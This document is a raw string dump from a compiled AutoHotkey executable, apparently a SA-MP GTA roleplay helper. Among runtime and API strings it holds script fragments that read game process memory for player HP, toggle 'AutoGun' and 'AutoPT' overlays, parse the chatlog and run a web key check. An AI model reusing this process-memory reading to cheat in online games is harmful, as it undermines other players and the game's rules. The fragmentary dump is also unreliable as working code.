        " !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~",
        "Bopomofo",
        "EnvGet",
        "lookbehind assertion is not fixed length",
        "SetWindowRgn",
        "d$PMk",
        "1.1.37.01",
        "8D$Pt",
        "d$0H9k",
        "Event",
        "gui, 6:show, x%xh% y%yh% NoActivate, ",
        "sleep 125",
        "GetFocus",
        "P>q_Y~",
        "DefaultGui",
        "HcD$HH;",
        "E;,$|",
        "URLDownloadToFile, https://twl.su/favicon.ico, C:\\PA\\Logo.ico",
        "Maximize",
        "R6031",
        "Maroon",
        "'D8\\$Tu4",
        "A\\_[]",
        "t?@8-",
        "GetChild",
        "I9OHr",
        "AlwaysOnTop",
        "JoyInfo",
        "R6025",
        "uKfE9|$",
        "LoopFileLongPath",
        "Continuation section too long.",
        "Format",
        ">[uFH",
        "NumpadHome",
        "FileDelete",
        "j@8{#u",
        "|$ UATAUAVAWH",
        "`omni callsig'",
        "IcK`I",
        "Group",
        "tAffff",
        "GetCurrentProcessId",
        "v'L;o",
        "This control type should not have an associated subroutine.",
        "t$<fD",
        "CTRLUP",
        "T$dE3",
        "VT$pD",
        "RegQueryValueExW",
        ")t$0A",
        "L;%S%",
        "IfNotExist, C:\\PA\\Logo.ico",
        "if(GetKeyState(\"RButton\", \"P\"))",
        " C>TQ",
        "A_A^_]",
        ".?AVbad_cast@std@@",
        "Shutdown",
        "D;I$}",
        "L$x+L$ D",
        "Submenu does not exist.",
        "L$8H;L$@rQH+",
        "D$PL9oXt",
        "GetFileAttributesW",
        "rp := RegExReplace(rp, \"\\Q$\\Ehour\", time.h)",
        "EncodePointer",
        "+D$ Hc",
        "#MaxThreads 1000",
        "u(8D$`@",
        "D$pu;H",
        "gui, 4:font, s16",
        "#UseHook",
        "ModifyCol",
        "&euro;",
        "H9A8t",
        "l$ VATAUH",
        "frac34",
        "if !processHandle := DllCall(\"OpenProcess\", \"Int\", 24, \"UInt\", 0, \"UInt\", processID, \"Ptr\")",
        "GuiWidth",
        "9{P~93",
        "HcC H",
        "(A^_^[",
        "GetComputerNameW",
        "@SVATH",
        "A label must not point to a function.",
        "Iacute",
        "WinGetText",
        "E|$(H",
        "\\$@fD",
        "D$(yeE3",
        "GlobalAlloc",
        "InsertMenuItemW",
        "TaskbarCreated",
        "u@D8`",
        "Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.",
        "Invalid hotkey.",
        "D$h+D$`E8",
        "|$@I;",
        "Sinhala",
        "@SWATAUAVH",
        "&?PPPPPPP?",
        "(t$@I",
        "lstrcmpiW",
        "A]A\\]",
        "Telugu",
        "H+T$0JcL8",
        "Parameter #2 required",
        "v%H;k",
        "LoopFileShortPath",
        "This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.",
        "__cdecl",
        "H;|$p}",
        "GetACP",
        "@8p]t",
        "pound",
        "VK  SC",
        "\\$0H;",
        "TerminateProcess",
        "while Not FileExist(\"C:\\PA\\Logo.ico\")",
        "fD9$Gt",
        "l$xE3",
        "9k vq3",
        "AHK Keybd",
        "A_A\\][",
        "L9%8\\",
        "LoopFileSizeKB",
        "\\$HA;",
        "LcG`H",
        "!t$(H!t$ A",
        "InitializeCriticalSection",
        "LongDate",
        "v'H;}",
        "Input",
        "WININET.dll",
        "Mixer Doesn't Support This Component Type",
        "(D$@H",
        "EnvSet",
        "GetFullPathNameW",
        "VerQueryValueW",
        "v1H;s",
        ";\\$p|",
        "ANYCRLF)",
        ":?:/agun::",
        "#InstallKeybdHook",
        "`vbase destructor'",
        "\\P{Xan}",
        "The same variable cannot be used for more than one control.",
        "SUATAUH",
        "ReadProcessMemory",
        "(not the user's), because the keyboard hook isn't installed.",
        "@8*t<",
        "IsWindowEnabled",
        "SB_SetIcon",
        "`dynamic atexit destructor for '",
        "SHFileOperationW",
        "USWATAUH",
        "t4f9>t/H",
        "Too many declarations.",
        "!>6'Y",
        "D9%sW",
        "IsCharAlphaNumericW",
        "if(i==s-1)",
        "USVWAUH",
        "WinGetActiveTitle",
        "RCtrl ",
        "l$ H;",
        "Media_Next",
        "SetEnvironmentVariableW",
        "CATCH with no matching TRY",
        "\\P{Xsp}",
        "Saurashtra",
        "t$H8]",
        "USVWH",
        "APH+A@",
        "L$ UATAUAVAWH",
        " GTA RolePlay\")",
        "Duplicate label.",
        "tBfA;",
        "D$(+D$ fA",
        "D$ 9h",
        "- pure virtual function call",
        "A+G(L",
        "unknown option bit(s) set",
        "ApplicationFrameWindow",
        "GuiControl, 1:, M1, % ahk[i-2]",
        "T$ H+",
        "(|$PH",
        "(null)",
        "&circ;",
        "AUAVH",
        "ShortDate",
        "D+d$xL",
        "LoopFileSize",
        "if RegExMatch(GetChatLine(1), \"",
        "w%fE;",
        "8D$8t",
        "ShiftAltTab",
        "ControlList",
        "WATAUAVAWH",
        "SysTreeView32",
        "%s: %s object",
        "Sundanese",
        "IcC\\A",
        "GetSystemMetrics",
        "assertion expected after (?(",
        "`A^_[",
        "ProgramsCommon",
        "xac:=A_ScreenWidth / 2 -75",
        "A]A\\_^]",
        "[[[[[[[[[[[[[[[[[",
        "DeviceIoControl",
        ":T$Pr",
        "LButton",
        "D$`fD9'H",
        "@UVWH",
        "LeaveCriticalSection",
        "BlockInput, on",
        "InputHook",
        "GuiControl, 5:, pstatus, ",
        "~!fffffff",
        "NumpadRight",
        "L# E3",
        "`A^A]_",
        "WorkingDir",
        "Center",
        "l$(A^",
        "`local vftable'",
        "AutoHotkey2",
        "HKEY_CURRENT_USER",
        "CreateThread",
        "March",
        "TreeView",
        "v'H;w",
        "RegEnumValueW",
        "L$pA9",
        "w4t*H",
        "D9&tPH",
        "Create",
        "Bamum",
        "D$PE3",
        "#E8g#u",
        "C:f9A",
        "curren",
        "FileCopy",
        "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV[[[[[[[[[[[[[[[[",
        "DeleteAll",
        "Can't Change Setting",
        "NewEnum",
        "8L$1H",
        "Count",
        "GetTextMetricsW",
        ".?AUIEnumVARIANT@@",
        "Capacity",
        "l$`L9c",
        "ScrollLock",
        "Unlock",
        "- Attempt to initialize the CRT more than once.",
        "Parameter #1 required",
        "D$8HcH",
        ">-u-fA",
        "_logb",
        ":\" id2)",
        "SysMenu",
        "REG_DWORD_BIG_ENDIAN",
        "November",
        "PixelGetColor",
        ": %id2%",
        "LoopRegName",
        "HcD$@",
        "mixerGetDevCapsW",
        "R6026",
        "@UVATAVH",
        "LineFile",
        "Volume",
        "DefaultTreeView",
        "D$PH9F",
        "RegOpenKeyExW",
        "#LTrim",
        "#Include",
        "Parameters must not be declared.",
        "&Pause Script",
        "ClipboardAll",
        "AppsKey",
        "SendEvent",
        "__Init",
        "%%%s%s%s",
        "?UUUUUU",
        "t$pL9c",
        "fD9:u",
        "DropDownList",
        "&Open",
        "ograve",
        "__unaligned",
        "REG_EXPAND_SZ",
        "IsUnicode",
        "GuiControl, 5:,pname, ",
        "Stopped",
        "Mc,$E",
        " A_A^A]A\\_^]",
        ".?AUIObjectComCompatible@@",
        "S>$hkDh$h>[2",
        "SetDefaultMouseSpeed 0",
        "Choice",
        "D9v(ua",
        "|$DE3",
        "Q5rHg,>",
        "?f`Y4",
        "ImageList_GetIconSize",
        "\"e?<<<<<<l?",
        "msctls_hotkey32",
        ";(tNH",
        "|L~ u",
        "D9uP~uI",
        "\\N is not supported in a class",
        "[*ncd>0",
        "SHIFTDOWN",
        "T$0E3",
        "fA9D$",
        "EnumFontFamiliesExW",
        "The leftmost character above is illegal in an expression.",
        "SUVWATH",
        "UWATAUAWH",
        "While colSettings[objOSItem]",
        "Duplicate hotkey.",
        "A]A\\^]",
        "@VATAUAVAWH",
        "Common",
        "zc%C1",
        "if RegExMatch(rps, \"\\Q$\\Eid\", out)",
        ":?:/hud::",
        "\\P{L}",
        "@UAUH",
        "__Handle",
        "Level",
        "WinWaitClose",
        "A_Args",
        "u0f9C",
        "SizeNS",
        "T$p<\"",
        "])6M>&",
        "Hotkey",
        "L$PfA",
        "@UVATH",
        "gui, 4:add, text, x0 y0 w150 cRed  vapt +Center , AutoPT",
        "L$ E3",
        "Atilde",
        "sendchat(\"/patrul\")",
        "n03>Pu",
        "Up/Dn",
        "l$0fD",
        "9uu2H",
        "wKfffff",
        "WriteProcessMemory",
        "D$hE3",
        "H;59t",
        "if open",
        "Missing \")\"",
        "IcqHH",
        "AdjustTokenPrivileges",
        "SendMessageTimeoutW",
        "FileTimeToSystemTime",
        "K&>.yC",
        "Parameters of hotkey functions must be optional.",
        "H;Y(~!H",
        "L$xfA",
        "D|pf9D$p",
        "KillTimer",
        "set cdaudio door %s wait",
        "T$\\D;",
        "rp := RegExReplace(rp, \"\\Q$\\Eyear\", time.y)",
        "xap:=A_ScreenWidth - 250",
        "FileCreateShortcut",
        "RegWrite",
        "t>fff",
        "|b=})>",
        "ATAVH",
        "D8y#u",
        "d$`E3",
        "@SUAVH",
        "`eh vector vbase copy constructor iterator'",
        "gui, 2:font, s16",
        ")t$`L",
        "MonitorName",
        "ControlFocus",
        "&Variables and their contents",
        "C<9C8u(",
        "InternetCloseHandle",
        "A_A][]",
        ".?AVEnumerator@Object@@",
        "u'ffffff",
        "-()[]{}:;'\"/\\,.?!",
        "D8k#u",
        "too many forward references",
        "f#^0f",
        "@8s#u",
        "Unexpected \"]\"",
        "VS_VERSION_INFO",
        "N>O=I9",
        "\\$XE3",
        "tM@8s#u",
        "SplashTextOff",
        "\"%s\" is not a valid key name.",
        "USATAVAWH",
        "\"\"\"\"&*.2666::>>>CCCCCHMMVV$",
        "status cd mode",
        ".?AVBoundFunc@@",
        "FileCopyDir",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "GetClassLongPtrW",
        "@SAVAW",
        "xapt:=A_ScreenWidth / 2 - 225",
        "e@A_A^A]A\\_^]",
        "D9-s}",
        "r&D8g",
        "malformed number or name after (?(",
        "f98u,A",
        "Telephone",
        "D$ E3",
        "open %s type cdaudio alias cd wait shareable",
        "-----",
        "`dynamic initializer for '",
        "REG_RESOURCE_REQUIREMENTS_LIST",
        "\"%-1.300s\"",
        "SetCurrentDirectoryW",
        "D9uPL",
        "A;\\$ ",
        "false",
        "WindowFromPoint",
        "|$ ATAUAVAWI",
        "1#SNAN",
        "c0&>`",
        "FileRead, file, %A_MyDocuments%\\GTA San Andreas User Files\\SAMP\\chatlog.txt",
        "LoopFileAttrib",
        "L?UUUUUUU?",
        "LcJDLcB@H",
        " A^A]A\\_^",
        "t$ ATH",
        "?.uI3",
        "|$ Hc",
        "GetDriveTypeW",
        "Z\\>z8",
        "DOMAIN error",
        "StartMenu",
        "@SAUH",
        "BSR_UNICODE)",
        "ThenPlay",
        "l$ VWATAUAVH",
        "xppwpp",
        "fD9:r",
        "\\c at end of pattern",
        "EndKey",
        "An exception was thrown.",
        "SHGetDesktopFolder",
        "Headphones",
        "GuiControl,10:+cRed +Redraw, StatusAC",
        "@\"=cJ",
        "fD9?u",
        "CD;T$X",
        "|$HfA",
        "[[[[[[[[[[[[[[[[[[[[[[VVVVVVVVVVVVV",
        "D$$fE",
        "fD9t$@u",
        "F0HcH",
        "\\$ VWATAUAWH",
        "L$TfA",
        "(t$pH",
        "f9lL0u ",
        "d$X9YP~13",
        "fA9D{",
        "68Y#u",
        "Deref",
        "global",
        "d$PE3",
        "9E v-H",
        "msctls_progress32",
        "Script info will not be shown because the \"Menu, Tray, MainWindow\"",
        "D$0Hc",
        "iniread, name, rp.ini, settings, name",
        "iniread, org, rp.ini, settings, org",
        "E8|$(tmD8=0j",
        "D;l$8",
        "u*D9%a,",
        "EnumChildWindows",
        "D$PH#",
        "print",
        "HA^A]A\\_^[",
        "Icirc",
        "WIN32_NT",
        "/2GG>!B",
        "SetTimer, omenu, 1",
        "H;W }yA",
        "<7H;|$xr+H",
        "ReadOnly",
        "WCreateProcessWithLogonW.",
        "CreateMenu",
        "return prread(getprocessid(), player + 0x548, \"float\")",
        "return processHandle",
        "gui, auth:Destroy",
        "RWINUP",
        "MonitorWorkArea",
        "L# Hc",
        "\\P{Nd}",
        "@8n(t5@8-",
        "u#HcMP",
        "WantCtrlA",
        "#KeyHistory",
        "Program Manager",
        "<$iu.H",
        "WaitClose",
        "if(line:=findline(\"",
        "StringLower",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "This local variable has the same name as a global variable.",
        "if !apt",
        ";^ r\"H",
        "Mb@A\"",
        "EnvDiv",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "T$8E3",
        "OwnDialogs",
        "E&xit (Terminate Script)",
        "v'H;{",
        "t$0Hc",
        "D$`fD",
        "?7zQ6$",
        "|L.\\u",
        "if !RegExMatch(GetChatLine(0), \"",
        "AhkPath",
        "Serial",
        "Select Folder - %s",
        "MoveDraw",
        "if(GetKeyState(\"S\", \"P\"))",
        "if(GetKeyState(\"D\", \"P\"))",
        "#MaxThreadsBuffer",
        "H;G8u",
        "cmenu() {",
        "Position",
        ";,u-ff",
        "t[I)l$8A",
        "`vector copy constructor iterator'",
        "t$`D8",
        "GetUserNameW",
        "A_A^A\\_]",
        "`A_A^A]A\\_^]",
        "Parameter #1 must not be blank in this case.",
        "fD93u",
        "D$l+D$dE8",
        "L$xHcT$X",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "AutoHotkey v1.1.37.01",
        "E7 %04X",
        "DeleteFileW",
        "FileSelectFolder",
        "9D$XA",
        "igrave",
        "RegDeleteValueW",
        "MinSendLevel",
        "Object.Enumerator",
        "The script was not reloaded; the old version will remain in effect.",
        "A_A^A]A\\[",
        "FileGetTime",
        "%s (%d) : ==> %s",
        "Buhid",
        "Glagolitic",
        ")t$`tz",
        "gui, 1:add, text,  cWhite vM2 x0 w250 Center, % ahk[i-1]",
        "Green",
        "Gui, 2:show, x%xac% y%yac% w150 NoActivate, ",
        "<>H;|$xr+H",
        "InternetReadFileExA",
        "DrawIconEx",
        "Runtime Error!",
        "UNTIL with no matching LOOP",
        "|$PE3",
        "- not enough space for locale information",
        "SUVWAUAWH",
        "StatusAC:=!StatusAC",
        "szlig",
        "{ ATH",
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
        "Invalid Gui name.",
        "@>%>b",
        "SizeofResource",
        "L$PfH",
        ": %shp1%",
        "WorkerW",
        "return i",
        "AppData",
        "HeapQueryInformation",
        "different names for subpatterns of the same number are not allowed",
        "two named subpatterns have the same name",
        "<>H;}",
        ".?AVExprOpFunc@@",
        "gui, 5:hide",
        "rp := RegExReplace(rp, \"\\Q$\\Ereason\", reason)",
        "The InputBox window could not be displayed.",
        "user32.dll",
        "EndDialog",
        "Right",
        "D8mju",
        "Until",
        "@USVWATAVAWH",
        "SHIFTUP",
        "Clone",
        "\\$PE3",
        "|$@H;",
        "C\"$\"<",
        "f9*t8",
        "Focused",
        "DriveGet",
        "#HotkeyInterval 1000",
        "CreateRoundRectRgn",
        "MsgBox, ",
        "gui, 5:add, text, x10 y80 w250 cWhite  vpid, ",
        "Duplicate parameter.",
        "GetQueueStatus",
        "A;}$}",
        "StringMid",
        "A9t$ ",
        "|$HE8",
        "NoMainWindow",
        "@8t$ ",
        "Modifiers (Hook's Physical) = %s",
        "\\$ UWATH",
        "CWD>~3",
        "FormatMessageW",
        "divide",
        "[[[[[[[[[[[[[",
        "XA_A^A]A\\_^][",
        ": %nick2%",
        "#Delimiter",
        "Modifiers (GetKeyState() now) = %s",
        "Balinese",
        "thorn",
        "vSIc@,H",
        "advapi32",
        "The following %s name contains an illegal character:",
        "ERCPt",
        "\\$8fD",
        "A+C0fE",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "fD9t$b",
        "CreateMutexW",
        "#MaxHotkeysPerInterval",
        "Function name too long.",
        "[[[[[[[[[[[[[[[",
        "Round",
        "Label",
        "|$8fA",
        "@SVAVAWH",
        "v%H;}",
        "{Blind}",
        "A9t$X~-A",
        "A0I9B0",
        "H+D$@E",
        "<4H;}",
        "H;0t,",
        "d$0E;",
        "pfD9f",
        "HeapReAlloc",
        "OnOff",
        "vXI;\\$",
        "L9X8t",
        "#IfWin",
        "fffffff",
        "NotifyNonText",
        "&fnof;",
        "L$0E3",
        "`+!]?",
        "v(H;{",
        "VarSetCapacity(buf, numBytes, 0)",
        "Unregistered window class.",
        "D$ fE",
        "ahk_default",
        "%sLeft",
        ":u!f9",
        "Gui, 1:Destroy",
        "Volume_Up",
        "ShellExecuteExW",
        "SB_SetText",
        "ahk_group",
        "%s%s%s",
        ".?AVObjectBase@@",
        "Ctrl+H",
        "D9J(tVH",
        "A control's variable must be global or static.",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "Ctrl+L",
        "fD98u",
        "Style",
        "+f)>0'",
        "v'L;g",
        "GetCursorPos",
        "Local",
        "close cd wait",
        "RegQueryInfoKeyW",
        "Environment",
        "IfNotExist",
        "InsertAt",
        "Avestan",
        "gui, 2:hide",
        "Integer",
        "<$-Hc",
        " !\"\"#$%&'((()*+,-./0123456789:;<=>?@AABCDEFGHFIJKKALAAM",
        " (.*)\", id)",
        "%sRight",
        "                          ",
        "FlsFree",
        "Missing comma",
        "InternalName",
        "Locale",
        " A_A^A]_^][",
        "D$ H#",
        "WinGetActiveStats",
        "L$ Hc",
        "PRUNE",
        "QSoundPan",
        ".?AVTextStream@@",
        "(;} r",
        "l$`tB",
        "_oD>Kg",
        "unrecognized character after (? or (?-",
        "Media_Stop",
        "The AltTab hotkey \"%s\" must have exactly one modifier/prefix.",
        ".?AUIObject@@",
        "LoopField",
        "STILL WAITING (%0.2f): ",
        "RichC",
        "?kxG2)",
        "TTTTT",
        "Custom",
        "|$@E3",
        "k-hook",
        "This character is not allowed here.",
        "ScriptHwnd",
        "&Web Site",
        "Line#",
        "t$0tP",
        "H+D$`H",
        "bad exception",
        "CoUninitialize",
        "GuiControl, 3:+cRed +Redraw, agun",
        "C!yTH",
        "Function recursion limit exceeded.",
        ".text",
        "Embed Source",
        "D$8;C s",
        "XButton2",
        "WinShow",
        "ThisMenuItemPos",
        "IconHidden",
        "z\\uZf",
        "fD; s H",
        "if(GetKeyState(\"W\", \"P\"))",
        "ListLines",
        "The program will exit.",
        "w(tBH",
        "Menu does not exist.",
        "v9H;s",
        "t$ E3",
        "0A^A]_",
        "H+M0x",
        "Insert",
        "internal error: unknown opcode in find_fixedlength()",
        "btnstart:",
        "L$hA;",
        "NIc{$I",
        "RegCreateKeyExW",
        "FileRead",
        "yZZZ[[b",
        "fD9%@",
        "L$XE3",
        "IsHungAppWindow",
        "shHcD$XH",
        "__stdcall",
        "}u4fA",
        "v!H;o",
        "WIN_8.1",
        "v$H;k",
        "joyGetDevCapsW",
        "&trade;",
        "unrecognized character follows \\",
        "SetBatchLines -1",
        "Xdigit",
        "L$xt9@",
        "DialogBoxParamW",
        "ComObjType",
        "@A]A\\_^]",
        "(A]A\\_^][",
        "<$+u>I",
        "H9\\$puv",
        "L$xE3",
        "gui, 6:hide",
        "f92t+H",
        "comctl32",
        "t#D85#T",
        "<acos",
        "!|$DHc",
        "UTF-16",
        "u6H9w",
        "Arabic",
        "SetImageList",
        "spare error",
        "frac12",
        "GuiControl,10:+cGreen +Redraw, StatusAC",
        "DriveSpaceFree",
        "D8e t",
        "@SWAVH",
        "D8d$Pt",
        "- not enough space for lowio initialization",
        "GetCharABCWidthsW",
        "KeyDuration",
        "Bad dynamic_cast!",
        "Invalid class variable declaration.",
        "ahk[s] := A_LoopField",
        "StrGet",
        "EndKey:",
        "NoTicks",
        "A Goto/Gosub must not jump into a block that doesn't enclose it.",
        "fD9d$`",
        "&dagger;",
        "argument is compiled in 8 bit mode",
        "fD9(u",
        "blank",
        "GetModuleHandleW",
        "SetClipboardData",
        "L$0u8",
        "if !StatusAC",
        "Volume_Mute",
        "u58D$0",
        "xag:=A_ScreenWidth / 2 + 75",
        "Can't Get Current Setting",
        "Cancel",
        "Smooth",
        "ALTDOWN",
        "A03>A|",
        "NumpadDiv",
        "not contains",
        "PA]A\\_",
        "SHELL32.dll",
        "m-hook",
        "Invalid `%.",
        "|$BM;",
        "TranslateMessage",
        "1#INF",
        "Synth",
        "OSType",
        "USVATAUAVAWH",
        "Cypriot",
        "rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr",
        "sendinput {s down}",
        " (preempted: they will resume when the current thread finishes)",
        "@USWATH",
        "GetFileVersionInfoSizeW",
        "CreateProcessW",
        "BETWEEN requires the word AND.",
        "u.D8-",
        "D$xH;",
        "omenu() {",
        "%s%c%s%cAll Files (*.*)%c*.*%c",
        ".?AUIUnknown@@",
        "ActivateKeyboardLayout",
        "t$`L9c",
        ": .......",
        "9]X~)3",
        "Backspace",
        "L9+u^D8k",
        "RWINDOWN",
        "status AHK_PlayMe mode",
        "Radio",
        "Report",
        "%u.%u.%u",
        "if !DllCall(\"CloseHandle\", \"Ptr\", processHandle, \"UInt\") && !result",
        "k D9kX~,",
        "WinMenuSelectItem",
        "(see #MaxHotkeysPerInterval in the help file)",
        "0A_A\\_",
        "Files",
        "Unsupported parameter default.",
        "remed:=1",
        "AddClipboardFormatListener",
        "\\$ E9c",
        ".?AVRegExMatchObject@@",
        "Error at line %u",
        "SetMenuInfo",
        "Line Text: %-1.100s%s",
        "d$PfE;",
        "TTS(text)  {",
        "LoopFileTimeCreated",
        "ThenEvent",
        "base.__Init()",
        "D$,+D$$f",
        "ProductVersion",
        "v/L;w",
        "SetStoreCapslockMode",
        "td@8o#u",
        "EndChar",
        "L$BfA",
        "StringCaseSense",
        "Prompt",
        "L9t$8u",
        "^RfN>",
        "A_A]A\\_^]",
        "ugrave",
        "xf9t$ taH",
        "argument is not a compiled regular expression",
        "clsid",
        "Friday",
        "iniread, tag, rp.ini, settings, tag",
        "h>1my",
        "acuff() {",
        "an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT)",
        "ComObject",
        "ClassOverwrite",
        "Caret",
        "M(H;M rFH",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "MsgBox",
        "AltTabMenu",
        "loop, parse, cmd, `n",
        "(;_ r",
        "Blank group name.",
        "uSfE9",
        " ffffff",
        "L$Pffff",
        "GetClassInfoExW",
        "LCtrl",
        "VScroll",
        "d$0E3",
        "CreateFileW",
        "MinParams",
        "Too many params.",
        "D8\\$1tID9",
        "u&D95",
        "f97t%L",
        "A^A]A\\_^[]",
        "|$T.|BH",
        "Gui, 1:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "CoInitialize",
        "Too many fonts.",
        "TimeIdlePhysical",
        "u,fA97u&",
        "StereoEnh",
        "xA_A^A]A\\_^][",
        "RemovePropW",
        "Gui, 4:show, x%xapt% y%yapt% w150 NoActivate, ",
        "gui, 3:add, text, x0 y0 w150 cRed  vagun +Center , AutoGun",
        "Gui, 2:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "- Attempt to use MSIL code from this assembly during native code initialization",
        "KeyDurationPlay",
        "if(GetKeyState(\"A\", \"P\"))",
        "u7D9-F_",
        "Picture",
        "Invert",
        "%s%s:%s %-1.500s",
        "GDI32.dll",
        "Brahmi",
        "`.rdata",
        "gui, 6:Destroy",
        "Progman",
        "D$PM98u",
        "t%I+WHA",
        "L$0H+",
        " Hct$p3",
        "Text Documents (*.txt)",
        "August",
        "opengta()",
        "Transform",
        "Buttons",
        "COMDLG32.dll",
        "fD9.u",
        "GnfA9",
        "Write",
        "- not enough space for _onexit/atexit table",
        "missing ) after comment",
        "GetSystemTimeAsFileTime",
        "Could not create window.",
        "y0%uT",
        "l$`fD",
        "|$8H+",
        ")|$Pf",
        "L$8A+",
        "\\$@tQ",
        "RAlt ",
        "OutputDebug",
        "^8U)zj",
        "SendLevel",
        "T$Ff;",
        "autogun:=!autogun",
        "fD9l$@",
        "fD91u",
        "Array",
        "REG_LINK",
        "gui, 6:show, NoActivate",
        "u=9=`|",
        "GetClientRect",
        "plusmn",
        "n]?iJ",
        "ahk_dlg",
        "t$H;|$P",
        "H(H9J(u",
        "`vector deleting destructor'",
        "AttachThreadInput",
        "diouxX",
        "D$`H;",
        "ThisMenuItem",
        "Phags_Pa",
        "Specifically: %-1.100s%s",
        "|$ Hi",
        "t0fD9",
        "if(i==1)",
        "D$pE3",
        "D$hL;",
        "v-H;n",
        "H;B8}",
        "ADVAPI32.dll",
        "Choose",
        "MinimizeBox",
        "if RegExMatch(WebRequest.responseText, key)",
        "F|McF|E3",
        "gui, 3:color, Black",
        "StatusBarWait",
        "InternetOpenUrlW",
        "RegisterCallback",
        "Blank parameter",
        "                                 H",
        "Trans",
        "GetFileSize",
        "Eacute",
        "Yellow",
        "A>l$/",
        "t$X+L$pH",
        "D8%aJ",
        "Kannada",
        "<orf<qwb",
        "SetFilePointerEx",
        "Ograve",
        "H;M rAH+E(LcM",
        "CANCEL",
        "laquo",
        "ProcessPath",
        "BitOr",
        "set cd door %s wait",
        "global toggle:=1",
        ".----/01/01/01",
        "Enter",
        "fE9|$",
        "D$@E3",
        "+D$4Hc",
        "CreateIconIndirect",
        "@UVWAUAVH",
        "uxtheme",
        "Process32FirstW",
        "D$XIc",
        "+uBE3",
        "UTF-8",
        "Connect",
        "u.?Z8",
        "Old_Persian",
        "TickCount",
        "LControl",
        "msctls_updown32",
        "?D8w#u]H",
        "Shavian",
        "r(+}8H",
        "d$hfD",
        "GetHP() {",
        "f98u0A",
        "CharLowerW",
        "[[[[[[[[[[[[[[[[[[",
        "Layout File",
        ".?AVLabel@@",
        "@SATH",
        "Gui, 2:Destroy",
        "fD9)u",
        "t$`;p ",
        "SysListView32",
        "t$hHc",
        "invalid condition (?(0)",
        "|$XfD",
        "NumpadPgDn",
        "@SVWAUAVH",
        "R6017",
        "D$L+D$D",
        "Parameter #2 must match an existing #If expression.",
        "explore",
        "ta=& ",
        "Black",
        "Critical",
        "SendInput {end}+{home}{del}{esc}",
        "Language",
        "ListLines Off",
        "#MenuMaskKey",
        "0A]A\\^",
        "repeating a DEFINE group is not allowed",
        "Hotstring not found.",
        "|$`fA",
        "1#IND",
        "hicon:",
        "D%HE3",
        "Tifinagh",
        "@8p#u",
        "|$hH;",
        "too many named subpatterns (maximum 10000)",
        "VVVVVVVVVVV",
        "zY;>u:m",
        "U(A;F }HH",
        "RemoveClipboardFormatListener",
        "t(fff",
        "GdipCreateHBITMAPFromBitmap",
        "Launch_App1",
        "MouseReset",
        "oI>O7",
        "ScriptDir",
        "fD9<pH",
        "V6E>`\"(5",
        "MouseGetPos",
        "EnumDisplayMonitors",
        "IsPaused",
        "?)tnH",
        "Expected \":=\"",
        "@SUVWATAUAVAWH",
        "Digital",
        "<&H;}",
        "PA^A]A\\_^][",
        "LoopReadLine",
        "Ctrl+V",
        "A]A\\_",
        "l$ VWATH",
        "HcL$0H",
        "D;+t1",
        "Execute()",
        "x_^][",
        "Kayah_Li",
        "ImageList_Create",
        "rp := RegExReplace(rp, \"\\Q$\\Emonth\", time.m)",
        "u4A;v }",
        "ldexp",
        "guihide()   {",
        "UseEnv",
        "VarSetCapacity",
        "Script lines most recently executed (oldest first).  Press [F5] to refresh.  The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0).  The bottommost line's elapsed time is the number of seconds since it executed.",
        "gettime() {",
        "UpDown",
        "L9d$xu",
        "fD9$Ou",
        "t&D8Z",
        "?{Q}<",
        "UATAUAVAWH",
        "AltSubmit",
        "stopped",
        "L$@;|",
        "Process Priority, , A",
        "NumpadDel",
        "Unreachable",
        "fD92t}H",
        "Hc@\\D",
        "Tabstop",
        "9xT~63",
